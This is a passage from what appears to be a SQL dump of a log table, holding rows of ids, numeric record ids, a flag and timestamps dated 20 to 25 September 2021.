22:43:16'),(34252,3290,1,'2021-09-20','2021-09-20 23:03:18'),(34253,3710,1,'2021-09-20','2021-09-20 23:07:20'),(34254,2751,1,'2021-09-20','2021-09-20 23:39:20'),(34255,1602,1,'2021-09-21','2021-09-21 00:17:59'),(34256,3127,1,'2021-09-21','2021-09-21 00:24:21'),(34257,1612,1,'2021-09-21','2021-09-21 01:12:02'),(34258,3245,1,'2021-09-21','2021-09-21 01:14:15'),(34259,1718,1,'2021-09-21','2021-09-21 02:44:35'),(34260,3790,1,'2021-09-21','2021-09-21 03:29:44'),(34261,3030,1,'2021-09-21','2021-09-21 04:25:24'),(34262,1588,1,'2021-09-21','2021-09-21 04:55:20'),(34263,1596,1,'2021-09-21','2021-09-21 05:15:06'),(34264,1602,1,'2021-09-21','2021-09-21 05:46:48'),(34265,89,1,'2021-09-21','2021-09-21 05:56:58'),(34266,1612,1,'2021-09-21','2021-09-21 06:07:57'),(34267,72,1,'2021-09-21','2021-09-21 06:15:38'),(34268,2989,1,'2021-09-21','2021-09-21 06:31:33'),(34269,3083,1,'2021-09-21','2021-09-21 06:38:36'),(34270,2813,1,'2021-09-21','2021-09-21 06:45:47'),(34271,3764,1,'2021-09-21','2021-09-21 07:14:41'),(34272,3030,1,'2021-09-21','2021-09-21 08:26:25'),(34273,68,1,'2021-09-21','2021-09-21 09:21:11'),(34274,68,1,'2021-09-21','2021-09-21 09:29:55'),(34275,2609,1,'2021-09-21','2021-09-21 09:41:58'),(34276,1588,1,'2021-09-21','2021-09-21 09:46:07'),(34277,80,1,'2021-09-21','2021-09-21 09:46:14'),(34278,4275,1,'2021-09-21','2021-09-21 10:00:37'),(34279,76,1,'2021-09-21','2021-09-21 10:01:08'),(34280,4275,1,'2021-09-21','2021-09-21 10:01:23'),(34281,68,1,'2021-09-21','2021-09-21 10:41:25'),(34282,4275,1,'2021-09-21','2021-09-21 10:45:03'),(34283,4275,1,'2021-09-21','2021-09-21 10:49:10'),(34284,472,1,'2021-09-21','2021-09-21 11:54:15'),(34285,1608,1,'2021-09-21','2021-09-21 12:17:26'),(34286,1598,1,'2021-09-21','2021-09-21 12:20:37'),(34287,84,1,'2021-09-21','2021-09-21 12:58:59'),(34288,89,1,'2021-09-21','2021-09-21 13:04:19'),(34289,473,1,'2021-09-21','2021-09-21 13:04:34'),(34290,91,1,'2021-09-21','2021-09-21 13:04:49'),(34291,3694,1,'2021-09-21','2021-09-21 13:04:49'),(34292,108,1,'2021-09-21','2021-09-21 13:05:42'),(34293,87,1,'2021-09-21','2021-09-21 13:08:38'),(34294,72,1,'2021-09-21','2021-09-21 13:09:42'),(34295,91,1,'2021-09-21','2021-09-21 13:19:12'),(34296,108,1,'2021-09-21','2021-09-21 13:20:06'),(34297,1602,1,'2021-09-21','2021-09-21 13:26:11'),(34298,1588,1,'2021-09-21','2021-09-21 13:27:51'),(34299,1718,1,'2021-09-21','2021-09-21 13:37:36'),(34300,1600,1,'2021-09-21','2021-09-21 13:54:45'),(34301,89,1,'2021-09-21','2021-09-21 14:08:42'),(34302,3705,1,'2021-09-21','2021-09-21 14:18:37'),(34303,89,1,'2021-09-21','2021-09-21 14:24:45'),(34304,89,1,'2021-09-21','2021-09-21 14:25:04'),(34305,2457,1,'2021-09-21','2021-09-21 14:25:14'),(34306,3710,1,'2021-09-21','2021-09-21 14:29:04'),(34307,3710,1,'2021-09-21','2021-09-21 14:59:43'),(34308,1600,1,'2021-09-21','2021-09-21 15:14:36'),(34309,87,1,'2021-09-21','2021-09-21 15:23:12'),(34310,1602,1,'2021-09-21','2021-09-21 15:37:37'),(34311,80,1,'2021-09-21','2021-09-21 15:37:44'),(34312,80,1,'2021-09-21','2021-09-21 15:43:45'),(34313,1728,1,'2021-09-21','2021-09-21 15:44:55'),(34314,1728,1,'2021-09-21','2021-09-21 15:45:28'),(34315,1728,1,'2021-09-21','2021-09-21 15:45:44'),(34316,2813,1,'2021-09-21','2021-09-21 16:04:02'),(34317,3486,1,'2021-09-21','2021-09-21 16:29:45'),(34318,3764,1,'2021-09-21','2021-09-21 17:05:46'),(34319,3307,1,'2021-09-21','2021-09-21 17:23:41'),(34320,91,1,'2021-09-21','2021-09-21 17:31:02'),(34321,473,1,'2021-09-21','2021-09-21 17:31:39'),(34322,91,1,'2021-09-21','2021-09-21 17:38:12'),(34323,1743,1,'2021-09-21','2021-09-21 17:38:34'),(34324,1743,1,'2021-09-21','2021-09-21 17:38:39'),(34325,1743,1,'2021-09-21','2021-09-21 17:38:45'),(34326,91,1,'2021-09-21','2021-09-21 17:38:59'),(34327,1699,1,'2021-09-21','2021-09-21 17:39:27'),(34328,1699,1,'2021-09-21','2021-09-21 17:39:34'),(34329,1699,1,'2021-09-21','2021-09-21 17:39:48'),(34330,1699,1,'2021-09-21','2021-09-21 17:40:25'),(34331,91,1,'2021-09-21','2021-09-21 17:40:28'),(34332,3541,1,'2021-09-21','2021-09-21 17:40:36'),(34333,3541,1,'2021-09-21','2021-09-21 17:40:37'),(34334,91,1,'2021-09-21','2021-09-21 17:46:43'),(34335,3278,1,'2021-09-21','2021-09-21 17:47:14'),(34336,3278,1,'2021-09-21','2021-09-21 17:47:15'),(34337,3278,1,'2021-09-21','2021-09-21 17:47:34'),(34338,3278,1,'2021-09-21','2021-09-21 17:47:42'),(34339,91,1,'2021-09-21','2021-09-21 17:47:54'),(34340,3307,1,'2021-09-21','2021-09-21 17:59:41'),(34341,3486,1,'2021-09-21','2021-09-21 18:40:17'),(34342,1586,1,'2021-09-21','2021-09-21 18:51:52'),(34343,3710,1,'2021-09-21','2021-09-21 19:02:56'),(34344,1588,1,'2021-09-21','2021-09-21 19:14:49'),(34345,1594,1,'2021-09-21','2021-09-21 19:25:20'),(34346,1606,1,'2021-09-21','2021-09-21 19:40:45'),(34347,3045,1,'2021-09-21','2021-09-21 19:43:50'),(34348,80,1,'2021-09-21','2021-09-21 19:43:56'),(34349,80,1,'2021-09-21','2021-09-21 19:45:08'),(34350,2309,1,'2021-09-21','2021-09-21 19:49:07'),(34351,1596,1,'2021-09-21','2021-09-21 19:50:10'),(34352,1606,1,'2021-09-21','2021-09-21 20:46:54'),(34353,2911,1,'2021-09-21','2021-09-21 20:50:07'),(34354,72,1,'2021-09-21','2021-09-21 20:59:31'),(34355,1602,1,'2021-09-21','2021-09-21 21:04:46'),(34356,2309,1,'2021-09-21','2021-09-21 21:52:38'),(34357,2410,1,'2021-09-21','2021-09-21 22:09:46'),(34358,1726,1,'2021-09-21','2021-09-21 22:44:11'),(34359,1600,1,'2021-09-21','2021-09-21 22:58:26'),(34360,1600,1,'2021-09-22','2021-09-22 00:31:07'),(34361,1582,1,'2021-09-22','2021-09-22 01:00:27'),(34362,3781,1,'2021-09-22','2021-09-22 03:39:06'),(34363,1594,1,'2021-09-22','2021-09-22 03:42:37'),(34364,1594,1,'2021-09-22','2021-09-22 03:51:34'),(34365,80,1,'2021-09-22','2021-09-22 04:44:07'),(34366,2309,1,'2021-09-22','2021-09-22 04:47:54'),(34367,3498,1,'2021-09-22','2021-09-22 05:35:35'),(34368,3482,1,'2021-09-22','2021-09-22 05:35:36'),(34369,3430,1,'2021-09-22','2021-09-22 05:35:36'),(34370,2956,1,'2021-09-22','2021-09-22 05:35:37'),(34371,3438,1,'2021-09-22','2021-09-22 05:35:37'),(34372,1600,1,'2021-09-22','2021-09-22 06:33:43'),(34373,1582,1,'2021-09-22','2021-09-22 06:47:52'),(34374,1602,1,'2021-09-22','2021-09-22 07:23:05'),(34375,3710,1,'2021-09-22','2021-09-22 08:17:50'),(34376,1588,1,'2021-09-22','2021-09-22 08:54:11'),(34377,1582,1,'2021-09-22','2021-09-22 09:50:51'),(34378,1588,1,'2021-09-22','2021-09-22 09:54:18'),(34379,1602,1,'2021-09-22','2021-09-22 09:59:31'),(34380,2148,1,'2021-09-22','2021-09-22 10:01:05'),(34381,84,1,'2021-09-22','2021-09-22 10:12:43'),(34382,2297,1,'2021-09-22','2021-09-22 10:13:58'),(34383,2503,1,'2021-09-22','2021-09-22 10:52:55'),(34384,1588,1,'2021-09-22','2021-09-22 10:54:19'),(34385,76,1,'2021-09-22','2021-09-22 10:57:21'),(34386,2297,1,'2021-09-22','2021-09-22 11:14:08'),(34387,2154,1,'2021-09-22','2021-09-22 11:44:11'),(34388,2161,1,'2021-09-22','2021-09-22 11:51:07'),(34389,68,1,'2021-09-22','2021-09-22 12:38:53'),(34390,68,1,'2021-09-22','2021-09-22 12:39:14'),(34391,2309,1,'2021-09-22','2021-09-22 12:47:54'),(34392,84,1,'2021-09-22','2021-09-22 12:53:01'),(34393,3691,1,'2021-09-22','2021-09-22 12:55:35'),(34394,3664,1,'2021-09-22','2021-09-22 12:57:49'),(34395,3691,1,'2021-09-22','2021-09-22 13:03:10'),(34396,84,1,'2021-09-22','2021-09-22 13:03:26'),(34397,3694,1,'2021-09-22','2021-09-22 13:03:51'),(34398,3691,1,'2021-09-22','2021-09-22 13:06:08'),(34399,3664,1,'2021-09-22','2021-09-22 13:09:30'),(34400,1877,1,'2021-09-22','2021-09-22 13:09:50'),(34401,1872,1,'2021-09-22','2021-09-22 13:11:59'),(34402,1870,1,'2021-09-22','2021-09-22 13:13:16'),(34403,84,1,'2021-09-22','2021-09-22 13:15:33'),(34404,91,1,'2021-09-22','2021-09-22 13:16:41'),(34405,3271,1,'2021-09-22','2021-09-22 13:19:04'),(34406,91,1,'2021-09-22','2021-09-22 13:24:57'),(34407,1780,1,'2021-09-22','2021-09-22 13:25:45'),(34408,1780,1,'2021-09-22','2021-09-22 13:26:05'),(34409,1780,1,'2021-09-22','2021-09-22 13:26:35'),(34410,1780,1,'2021-09-22','2021-09-22 13:28:05'),(34411,91,1,'2021-09-22','2021-09-22 13:31:43'),(34412,1778,1,'2021-09-22','2021-09-22 13:32:44'),(34413,1778,1,'2021-09-22','2021-09-22 13:33:01'),(34414,91,1,'2021-09-22','2021-09-22 13:36:11'),(34415,1776,1,'2021-09-22','2021-09-22 13:37:13'),(34416,1776,1,'2021-09-22','2021-09-22 13:37:47'),(34417,91,1,'2021-09-22','2021-09-22 13:38:45'),(34418,72,1,'2021-09-22','2021-09-22 13:47:09'),(34419,3240,1,'2021-09-22','2021-09-22 13:50:10'),(34420,3240,1,'2021-09-22','2021-09-22 13:50:29'),(34421,3240,1,'2021-09-22','2021-09-22 13:50:46'),(34422,91,1,'2021-09-22','2021-09-22 13:51:30'),(34423,3257,1,'2021-09-22','2021-09-22 13:52:11'),(34424,3257,1,'2021-09-22','2021-09-22 13:52:12'),(34425,91,1,'2021-09-22','2021-09-22 13:57:23'),(34426,3275,1,'2021-09-22','2021-09-22 13:58:51'),(34427,3269,1,'2021-09-22','2021-09-22 13:59:45'),(34428,3269,1,'2021-09-22','2021-09-22 14:00:03'),(34429,3269,1,'2021-09-22','2021-09-22 14:00:57'),(34430,3265,1,'2021-09-22','2021-09-22 14:01:09'),(34431,3265,1,'2021-09-22','2021-09-22 14:01:12'),(34432,3265,1,'2021-09-22','2021-09-22 14:01:37'),(34433,91,1,'2021-09-22','2021-09-22 14:03:55'),(34434,3247,1,'2021-09-22','2021-09-22 14:04:37'),(34435,3247,1,'2021-09-22','2021-09-22 14:04:58'),(34436,87,1,'2021-09-22','2021-09-22 14:05:44'),(34437,76,1,'2021-09-22','2021-09-22 14:06:57'),(34438,570,1,'2021-09-22','2021-09-22 14:16:19'),(34439,570,1,'2021-09-22','2021-09-22 14:16:44'),(34440,570,1,'2021-09-22','2021-09-22 14:17:22'),(34441,2248,1,'2021-09-22','2021-09-22 14:27:45'),(34442,2154,1,'2021-09-22','2021-09-22 14:28:00'),(34443,108,1,'2021-09-22','2021-09-22 14:32:14'),(34444,570,1,'2021-09-22','2021-09-22 14:32:36'),(34445,570,1,'2021-09-22','2021-09-22 14:33:13'),(34446,84,1,'2021-09-22','2021-09-22 14:35:17'),(34447,1877,1,'2021-09-22','2021-09-22 14:35:54'),(34448,84,1,'2021-09-22','2021-09-22 14:36:20'),(34449,91,1,'2021-09-22','2021-09-22 14:36:38'),(34450,1594,1,'2021-09-22','2021-09-22 14:38:51'),(34451,3275,1,'2021-09-22','2021-09-22 14:40:08'),(34452,2769,1,'2021-09-22','2021-09-22 14:55:25'),(34453,2248,1,'2021-09-22','2021-09-22 15:04:57'),(34454,2161,1,'2021-09-22','2021-09-22 15:09:22'),(34455,1600,1,'2021-09-22','2021-09-22 15:15:48'),(34456,3781,1,'2021-09-22','2021-09-22 15:18:55'),(34457,1598,1,'2021-09-22','2021-09-22 15:30:41'),(34458,2503,1,'2021-09-22','2021-09-22 15:35:50'),(34459,2309,1,'2021-09-22','2021-09-22 15:55:25'),(34460,1872,1,'2021-09-22','2021-09-22 16:00:50'),(34461,2161,1,'2021-09-22','2021-09-22 16:02:52'),(34462,89,1,'2021-09-22','2021-09-22 16:03:32'),(34463,89,1,'2021-09-22','2021-09-22 16:04:21'),(34464,4329,1,'2021-09-22','2021-09-22 16:07:51'),(34465,4326,1,'2021-09-22','2021-09-22 16:10:42'),(34466,4335,1,'2021-09-22','2021-09-22 16:10:52'),(34467,4323,1,'2021-09-22','2021-09-22 16:10:53'),(34468,4332,1,'2021-09-22','2021-09-22 16:12:00'),(34469,4338,1,'2021-09-22','2021-09-22 16:13:47'),(34470,4338,1,'2021-09-22','2021-09-22 16:13:48'),(34471,4338,1,'2021-09-22','2021-09-22 16:13:49'),(34472,4341,1,'2021-09-22','2021-09-22 16:14:16'),(34473,72,1,'2021-09-22','2021-09-22 16:17:28'),(34474,3742,1,'2021-09-22','2021-09-22 16:19:38'),(34475,2503,1,'2021-09-22','2021-09-22 16:21:37'),(34476,1600,1,'2021-09-22','2021-09-22 16:23:24'),(34477,91,1,'2021-09-22','2021-09-22 16:24:06'),(34478,2617,1,'2021-09-22','2021-09-22 16:41:37'),(34479,3257,1,'2021-09-22','2021-09-22 16:53:25'),(34480,469,1,'2021-09-22','2021-09-22 16:57:39'),(34481,72,1,'2021-09-22','2021-09-22 16:59:05'),(34482,4341,1,'2021-09-22','2021-09-22 17:00:25'),(34483,72,1,'2021-09-22','2021-09-22 17:01:51'),(34484,3066,1,'2021-09-22','2021-09-22 17:04:29'),(34485,1739,1,'2021-09-22','2021-09-22 17:08:30'),(34486,1594,1,'2021-09-22','2021-09-22 17:28:48'),(34487,2911,1,'2021-09-22','2021-09-22 17:33:37'),(34488,4326,1,'2021-09-22','2021-09-22 17:36:48'),(34489,3087,1,'2021-09-22','2021-09-22 17:47:27'),(34490,1598,1,'2021-09-22','2021-09-22 17:56:36'),(34491,3226,1,'2021-09-22','2021-09-22 17:58:37'),(34492,2457,1,'2021-09-22','2021-09-22 18:04:29'),(34493,2704,1,'2021-09-22','2021-09-22 18:28:15'),(34494,4335,1,'2021-09-22','2021-09-22 18:51:58'),(34495,72,1,'2021-09-22','2021-09-22 19:27:55'),(34496,72,1,'2021-09-22','2021-09-22 21:18:28'),(34497,3030,1,'2021-09-22','2021-09-22 23:33:45'),(34498,2309,1,'2021-09-23','2021-09-23 00:09:26'),(34499,1592,1,'2021-09-23','2021-09-23 00:42:14'),(34500,3781,1,'2021-09-23','2021-09-23 00:54:22'),(34501,3058,1,'2021-09-23','2021-09-23 00:54:24'),(34502,2309,1,'2021-09-23','2021-09-23 01:10:55'),(34503,3251,1,'2021-09-23','2021-09-23 01:40:58'),(34504,3030,1,'2021-09-23','2021-09-23 01:44:52'),(34505,2769,1,'2021-09-23','2021-09-23 01:54:42'),(34506,472,1,'2021-09-23','2021-09-23 02:10:52'),(34507,470,1,'2021-09-23','2021-09-23 03:10:52'),(34508,80,1,'2021-09-23','2021-09-23 06:40:58'),(34509,3245,1,'2021-09-23','2021-09-23 06:44:59'),(34510,2813,1,'2021-09-23','2021-09-23 06:45:00'),(34511,4338,1,'2021-09-23','2021-09-23 07:06:38'),(34512,4329,1,'2021-09-23','2021-09-23 07:19:57'),(34513,3781,1,'2021-09-23','2021-09-23 07:20:32'),(34514,4323,1,'2021-09-23','2021-09-23 07:56:50'),(34515,3104,1,'2021-09-23','2021-09-23 07:58:01'),(34516,3694,1,'2021-09-23','2021-09-23 07:58:32'),(34517,4323,1,'2021-09-23','2021-09-23 08:20:48'),(34518,4329,1,'2021-09-23','2021-09-23 08:45:24'),(34519,2457,1,'2021-09-23','2021-09-23 08:49:44'),(34520,2309,1,'2021-09-23','2021-09-23 08:50:26'),(34521,3781,1,'2021-09-23','2021-09-23 09:15:09'),(34522,4338,1,'2021-09-23','2021-09-23 09:16:21'),(34523,1598,1,'2021-09-23','2021-09-23 09:42:01'),(34524,1602,1,'2021-09-23','2021-09-23 09:53:43'),(34525,478,1,'2021-09-23','2021-09-23 10:03:02'),(34526,3004,1,'2021-09-23','2021-09-23 10:24:15'),(34527,3004,1,'2021-09-23','2021-09-23 10:26:09'),(34528,3746,1,'2021-09-23','2021-09-23 10:26:10'),(34529,469,1,'2021-09-23','2021-09-23 10:45:10'),(34530,472,1,'2021-09-23','2021-09-23 10:58:03'),(34531,2309,1,'2021-09-23','2021-09-23 11:04:10'),(34532,2309,1,'2021-09-23','2021-09-23 11:04:19'),(34533,2248,1,'2021-09-23','2021-09-23 11:04:20'),(34534,2309,1,'2021-09-23','2021-09-23 11:04:32'),(34535,2248,1,'2021-09-23','2021-09-23 11:04:35'),(34536,2309,1,'2021-09-23','2021-09-23 11:05:10'),(34537,1596,1,'2021-09-23','2021-09-23 11:08:44'),(34538,91,1,'2021-09-23','2021-09-23 11:23:44'),(34539,4238,1,'2021-09-23','2021-09-23 11:24:45'),(34540,3087,1,'2021-09-23','2021-09-23 11:28:41'),(34541,3087,1,'2021-09-23','2021-09-23 11:28:56'),(34542,2971,1,'2021-09-23','2021-09-23 11:33:23'),(34543,91,1,'2021-09-23','2021-09-23 11:41:05'),(34544,3087,1,'2021-09-23','2021-09-23 11:42:03'),(34545,91,1,'2021-09-23','2021-09-23 11:46:31'),(34546,3030,1,'2021-09-23','2021-09-23 11:48:52'),(34547,91,1,'2021-09-23','2021-09-23 11:57:09'),(34548,4357,1,'2021-09-23','2021-09-23 11:58:24'),(34549,1602,1,'2021-09-23','2021-09-23 12:00:16'),(34550,2165,1,'2021-09-23','2021-09-23 12:01:57'),(34551,2165,1,'2021-09-23','2021-09-23 12:02:16'),(34552,91,1,'2021-09-23','2021-09-23 12:15:00'),(34553,472,1,'2021-09-23','2021-09-23 12:18:23'),(34554,1582,1,'2021-09-23','2021-09-23 13:03:39'),(34555,1602,1,'2021-09-23','2021-09-23 13:21:25'),(34556,2159,1,'2021-09-23','2021-09-23 13:47:34'),(34557,2159,1,'2021-09-23','2021-09-23 13:47:45'),(34558,2159,1,'2021-09-23','2021-09-23 13:47:57'),(34559,2063,1,'2021-09-23','2021-09-23 14:31:23'),(34560,1870,1,'2021-09-23','2021-09-23 14:47:00'),(34561,72,1,'2021-09-23','2021-09-23 14:48:57'),(34562,1594,1,'2021-09-23','2021-09-23 15:04:54'),(34563,1594,1,'2021-09-23','2021-09-23 15:04:55'),(34564,1594,1,'2021-09-23','2021-09-23 15:05:00'),(34565,2658,1,'2021-09-23','2021-09-23 15:17:02'),(34566,2154,1,'2021-09-23','2021-09-23 15:22:49'),(34567,480,1,'2021-09-23','2021-09-23 15:40:44'),(34568,91,1,'2021-09-23','2021-09-23 16:10:53'),(34569,4368,1,'2021-09-23','2021-09-23 16:11:34'),(34570,80,1,'2021-09-23','2021-09-23 16:14:35'),(34571,80,1,'2021-09-23','2021-09-23 16:14:41'),(34572,2309,1,'2021-09-23','2021-09-23 16:41:36'),(34573,1602,1,'2021-09-23','2021-09-23 17:06:29'),(34574,1602,1,'2021-09-23','2021-09-23 17:07:51'),(34575,76,1,'2021-09-23','2021-09-23 17:08:23'),(34576,1602,1,'2021-09-23','2021-09-23 17:08:51'),(34577,1728,1,'2021-09-23','2021-09-23 17:14:28'),(34578,2309,1,'2021-09-23','2021-09-23 17:23:26'),(34579,1602,1,'2021-09-23','2021-09-23 18:22:17'),(34580,4335,1,'2021-09-23','2021-09-23 18:54:04'),(34581,4368,1,'2021-09-23','2021-09-23 18:56:00'),(34582,4368,1,'2021-09-23','2021-09-23 18:56:00'),(34583,469,1,'2021-09-23','2021-09-23 19:04:01'),(34584,2609,1,'2021-09-23','2021-09-23 19:22:03'),(34585,2971,1,'2021-09-23','2021-09-23 20:30:10'),(34586,80,1,'2021-09-23','2021-09-23 20:59:24'),(34587,1614,1,'2021-09-23','2021-09-23 21:29:22'),(34588,2813,1,'2021-09-23','2021-09-23 22:51:58'),(34589,1586,1,'2021-09-23','2021-09-23 23:02:04'),(34590,1726,1,'2021-09-23','2021-09-23 23:06:27'),(34591,72,1,'2021-09-23','2021-09-23 23:08:01'),(34592,1726,1,'2021-09-24','2021-09-24 00:30:15'),(34593,486,1,'2021-09-24','2021-09-24 00:30:34'),(34594,1588,1,'2021-09-24','2021-09-24 01:51:11'),(34595,1588,1,'2021-09-24','2021-09-24 01:52:05'),(34596,2159,1,'2021-09-24','2021-09-24 01:59:41'),(34597,3127,1,'2021-09-24','2021-09-24 02:29:37'),(34598,2804,1,'2021-09-24','2021-09-24 02:53:06'),(34599,469,1,'2021-09-24','2021-09-24 04:09:55'),(34600,2609,1,'2021-09-24','2021-09-24 04:49:56'),(34601,1588,1,'2021-09-24','2021-09-24 04:54:50'),(34602,472,1,'2021-09-24','2021-09-24 05:39:55'),(34603,2769,1,'2021-09-24','2021-09-24 05:45:39'),(34604,1614,1,'2021-09-24','2021-09-24 05:55:59'),(34605,1606,1,'2021-09-24','2021-09-24 06:25:48'),(34606,4332,1,'2021-09-24','2021-09-24 06:49:07'),(34607,4332,1,'2021-09-24','2021-09-24 06:49:19'),(34608,72,1,'2021-09-24','2021-09-24 06:53:49'),(34609,2775,1,'2021-09-24','2021-09-24 07:02:44'),(34610,1582,1,'2021-09-24','2021-09-24 07:30:21'),(34611,1877,1,'2021-09-24','2021-09-24 07:58:37'),(34612,1718,1,'2021-09-24','2021-09-24 08:07:43'),(34613,1588,1,'2021-09-24','2021-09-24 08:17:52'),(34614,1602,1,'2021-09-24','2021-09-24 08:30:38'),(34615,68,1,'2021-09-24','2021-09-24 08:37:11'),(34616,1586,1,'2021-09-24','2021-09-24 08:39:02'),(34617,1602,1,'2021-09-24','2021-09-24 08:54:13'),(34618,2457,1,'2021-09-24','2021-09-24 09:08:53'),(34619,1774,1,'2021-09-24','2021-09-24 09:17:23'),(34620,72,1,'2021-09-24','2021-09-24 09:43:15'),(34621,3710,1,'2021-09-24','2021-09-24 09:44:14'),(34622,76,1,'2021-09-24','2021-09-24 09:49:26'),(34623,68,1,'2021-09-24','2021-09-24 09:51:13'),(34624,1877,1,'2021-09-24','2021-09-24 09:53:53'),(34625,68,1,'2021-09-24','2021-09-24 09:54:26'),(34626,72,1,'2021-09-24','2021-09-24 09:54:52'),(34627,91,1,'2021-09-24','2021-09-24 09:55:30'),(34628,4368,1,'2021-09-24','2021-09-24 09:56:22'),(34629,4368,1,'2021-09-24','2021-09-24 09:56:23'),(34630,2813,1,'2021-09-24','2021-09-24 09:58:27'),(34631,1870,1,'2021-09-24','2021-09-24 10:03:00'),(34632,72,1,'2021-09-24','2021-09-24 10:03:42'),(34633,91,1,'2021-09-24','2021-09-24 10:04:42'),(34634,91,1,'2021-09-24','2021-09-24 10:04:49'),(34635,4238,1,'2021-09-24','2021-09-24 10:06:16'),(34636,4238,1,'2021-09-24','2021-09-24 10:06:18'),(34637,4373,1,'2021-09-24','2021-09-24 10:06:25'),(34638,4373,1,'2021-09-24','2021-09-24 10:06:27'),(34639,1596,1,'2021-09-24','2021-09-24 10:12:17'),(34640,1596,1,'2021-09-24','2021-09-24 10:13:33'),(34641,91,1,'2021-09-24','2021-09-24 10:14:26'),(34642,91,1,'2021-09-24','2021-09-24 10:16:50'),(34643,4357,1,'2021-09-24','2021-09-24 10:18:08'),(34644,4396,1,'2021-09-24','2021-09-24 10:22:01'),(34645,4396,1,'2021-09-24','2021-09-24 10:22:03'),(34646,91,1,'2021-09-24','2021-09-24 10:25:59'),(34647,4391,1,'2021-09-24','2021-09-24 10:27:10'),(34648,4391,1,'2021-09-24','2021-09-24 10:27:12'),(34649,4373,1,'2021-09-24','2021-09-24 10:34:06'),(34650,4373,1,'2021-09-24','2021-09-24 10:34:08'),(34651,91,1,'2021-09-24','2021-09-24 10:35:08'),(34652,91,1,'2021-09-24','2021-09-24 10:43:23'),(34653,4238,1,'2021-09-24','2021-09-24 10:52:06'),(34654,3541,1,'2021-09-24','2021-09-24 10:52:48'),(34655,3541,1,'2021-09-24','2021-09-24 10:52:49'),(34656,1728,1,'2021-09-24','2021-09-24 10:57:43'),(34657,1728,1,'2021-09-24','2021-09-24 10:58:03'),(34658,1728,1,'2021-09-24','2021-09-24 10:59:26'),(34659,1728,1,'2021-09-24','2021-09-24 11:00:11'),(34660,91,1,'2021-09-24','2021-09-24 11:16:54'),(34661,4373,1,'2021-09-24','2021-09-24 11:18:00'),(34662,4373,1,'2021-09-24','2021-09-24 11:18:01'),(34663,91,1,'2021-09-24','2021-09-24 11:18:48'),(34664,4368,1,'2021-09-24','2021-09-24 11:19:16'),(34665,4368,1,'2021-09-24','2021-09-24 11:19:19'),(34666,91,1,'2021-09-24','2021-09-24 11:25:29'),(34667,3280,1,'2021-09-24','2021-09-24 11:32:21'),(34668,2804,1,'2021-09-24','2021-09-24 11:58:52'),(34669,1726,1,'2021-09-24','2021-09-24 12:06:36'),(34670,72,1,'2021-09-24','2021-09-24 12:31:55'),(34671,2609,1,'2021-09-24','2021-09-24 12:38:15'),(34672,2904,1,'2021-09-24','2021-09-24 12:39:36'),(34673,2904,1,'2021-09-24','2021-09-24 12:39:48'),(34674,2609,1,'2021-09-24','2021-09-24 12:41:08'),(34675,2159,1,'2021-09-24','2021-09-24 12:51:17'),(34676,72,1,'2021-09-24','2021-09-24 13:54:06'),(34677,3781,1,'2021-09-24','2021-09-24 14:01:19'),(34678,3781,1,'2021-09-24','2021-09-24 14:14:23'),(34679,3781,1,'2021-09-24','2021-09-24 14:15:04'),(34680,1726,1,'2021-09-24','2021-09-24 14:21:18'),(34681,2769,1,'2021-09-24','2021-09-24 14:53:58'),(34682,472,1,'2021-09-24','2021-09-24 14:57:17'),(34683,3229,1,'2021-09-24','2021-09-24 15:02:00'),(34684,84,1,'2021-09-24','2021-09-24 15:04:43'),(34685,4238,1,'2021-09-24','2021-09-24 15:51:40'),(34686,3541,1,'2021-09-24','2021-09-24 15:51:41'),(34687,3541,1,'2021-09-24','2021-09-24 15:51:41'),(34688,4357,1,'2021-09-24','2021-09-24 15:51:41'),(34689,1582,1,'2021-09-24','2021-09-24 16:14:14'),(34690,2769,1,'2021-09-24','2021-09-24 16:21:08'),(34691,3253,1,'2021-09-24','2021-09-24 16:30:53'),(34692,2609,1,'2021-09-24','2021-09-24 17:14:16'),(34693,1588,1,'2021-09-24','2021-09-24 17:21:20'),(34694,2395,1,'2021-09-24','2021-09-24 18:20:09'),(34695,91,1,'2021-09-24','2021-09-24 19:30:05'),(34696,4373,1,'2021-09-24','2021-09-24 19:45:59'),(34697,4391,1,'2021-09-24','2021-09-24 19:46:52'),(34698,4238,1,'2021-09-24','2021-09-24 19:48:16'),(34699,4357,1,'2021-09-24','2021-09-24 19:49:29'),(34700,1586,1,'2021-09-24','2021-09-24 19:52:05'),(34701,3030,1,'2021-09-24','2021-09-24 20:31:01'),(34702,1600,1,'2021-09-24','2021-09-24 21:28:42'),(34703,4368,1,'2021-09-24','2021-09-24 21:31:13'),(34704,2775,1,'2021-09-24','2021-09-24 22:53:22'),(34705,1606,1,'2021-09-24','2021-09-24 23:18:15'),(34706,2159,1,'2021-09-24','2021-09-24 23:21:33'),(34707,2150,1,'2021-09-24','2021-09-24 23:28:46'),(34708,1602,1,'2021-09-24','2021-09-24 23:43:30'),(34709,68,1,'2021-09-24','2021-09-24 23:43:43'),(34710,80,1,'2021-09-24','2021-09-24 23:43:58'),(34711,1582,1,'2021-09-24','2021-09-24 23:54:45'),(34712,2457,1,'2021-09-25','2021-09-25 00:07:04'),(34713,80,1,'2021-09-25','2021-09-25 00:15:24'),(34714,3664,1,'2021-09-25','2021-09-25 00:41:09'),(34715,1606,1,'2021-09-25','2021-09-25 00:44:10'),(34716,3030,1,'2021-09-25','2021-09-25 00:52:31'),(34717,2813,1,'2021-09-25','2021-09-25 01:12:33'),(34718,3030,1,'2021-09-25','2021-09-25 01:26:38'),(34719,4341,1,'2021-09-25','2021-09-25 01:53:12'),(34720,3107,1,'2021-09-25','2021-09-25 02:21:21'),(34721,3245,1,'2021-09-25','2021-09-25 03:14:29'),(34722,1596,1,'2021-09-25','2021-09-25 03:16:46'),(34723,1588,1,'2021-09-25','2021-09-25 03:54:05'),(34724,3083,1,'2021-09-25','2021-09-25 04:21:55'),(34725,1600,1,'2021-09-25','2021-09-25 04:53:45'),(34726,2769,1,'2021-09-25','2021-09-25 05:14:18'),(34727,2395,1,'2021-09-25','2021-09-25 05:16:58'),(34728,3030,1,'2021-09-25','2021-09-25 05:33:52'),(34729,1718,1,'2021-09-25','2021-09-25 05:33:55'),(34730,1739,1,'2021-09-25','2021-09-25 05:58:32'),(34731,2457,1,'2021-09-25','2021-09-25 06:13:18'),(34732,72,1,'2021-09-25','2021-09-25 06:28:25'),(34733,3705,1,'2021-09-25','2021-09-25 07:14:07'),(34734,1588,1,'2021-09-25','2021-09-25 07:34:21'),(34735,3253,1,'2021-09-25','2021-09-25 07:34:24'),(34736,1600,1,'2021-09-25','2021-09-25 07:53:45'),(34737,1718,1,'2021-09-25','2021-09-25 07:54:08'),(34738,1598,1,'2021-09-25','2021-09-25 